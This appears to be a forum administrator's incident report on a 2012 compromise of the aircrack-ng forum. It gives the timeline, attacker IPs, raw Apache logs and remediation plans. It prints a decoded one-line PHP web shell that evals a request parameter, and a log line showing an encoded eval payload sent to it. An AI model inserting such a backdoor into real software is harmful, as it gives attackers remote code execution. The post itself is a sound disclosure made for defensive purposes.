Forum virus details

Hi,

as you know, I shut down the server a few days ago because I was told there was a virus. Here is what I know about it so far. This post will be updated as I know more. There is a summary at the end of this post which will be useful for your IT department.

The virus is also known by Sophos as Mal/Iframe-W and it was uploaded in the forum in a separate directory inside the forum, 'data'. It's a piece of PHP called rbvzv.php (1418 bytes) that has a payload encoded in base64. Then it is passed to the JavaScript function eval() which is going to execute it.
If any of you guys is interested in the piece of code, you can download it here (the password is rbvzv.php) and please don't use it for malicious purposes; I'd love to know what it does but unfortunately I don't have the knowledge yet to decode it. I can read Javascript but the problem is that it's not plain Base64.

I checked the whole server and the attacker got in through the web server, no login and apache didn't have any privileges (user without bash, etc).

For those who are interested, here is the raw apache log from the attack:
91.224.160.132 - - [23/May/2012:01:12:04 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 15 "http://forum.aircrack-ng.org/phpmyadmin/index.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)"
190.102.136.196 - - [23/May/2012:20:22:43 +0200] "POST /data/rbvzv.php HTTP/1.0" 200 727 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
81.30.222.42 - - [23/May/2012:20:23:26 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
116.55.19.96 - - [23/May/2012:20:24:50 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
61.50.171.2 - - [23/May/2012:20:28:15 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
178.218.224.2 - - [23/May/2012:20:27:01 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
200.222.109.146 - - [24/May/2012:07:48:55 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0"
200.223.136.254 - - [24/May/2012:11:50:31 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
210.101.131.232 - - [24/May/2012:15:49:50 +0200] "POST /data/rbvzv.php??asc=eval(base64_decode(%27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP/1.1" 200 19 "-" "Chrome/15.0.860.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/15.0.860.0"

As you can see, the file was created by that first guy, 91.224.160.132 and the timestamp (creation and last modification) of the file confirms it:
-rw-r--r-- 1 USER GROUP 1418 2012-05-23 01:12 rbvzv.php

I have to thank @SwissHttp on twitter for decoding it and here is the result (PHP):
if(isset($_REQUEST['a'.'s'.'c']))eval(stripslashes($_REQUEST['a'.'s'.'c']));


Basically, it executes what is passed in the parameter 'asc' (and strips slashes) and you can see an example use on the last line of the Apache log posted above. I'll see if I can get my hands on the complete request and not just part of it.

Unfortunately, I don't think I can do anything against those guys (besides talking about it), a whois on that IP address looks like it's a shady business (Bergdorf Group Ltd): IP in the Netherlands but the person to contact lives in the Virgin Islands. Anyway, I sent them an email. I got an answer this morning (May 30) asking for some more information that I just provided. We'll see how it goes.

As far as I know, it is limited to the forum and nothing else. The attacker didn't get on the server or installed any backdoor.

So here is what I'm gonna do next: I'll check the forum database to see if they tried anything else against the forum (and check the apache logs to see if there is any other mention of those IP addresses). I want to know how it happened exactly and when.
The forum is probably going to stay down for another week, I want to migrate it to another server and I need to make sure everything works properly and the new DNS are propagated.


So, to summarize: it happened a day before I got the email letting me know there is a virus. It happened May 22 at 23h12 (11.12pm) GMT/UTC and I stopped it on May 24, around 14h00 (2pm) GMT/UTC.
I don't remember noticing anything special when browsing the forum between those dates (I'm not sure if I browsed it on those dates). In case you experienced anything, let me know. I'm really sorry about it.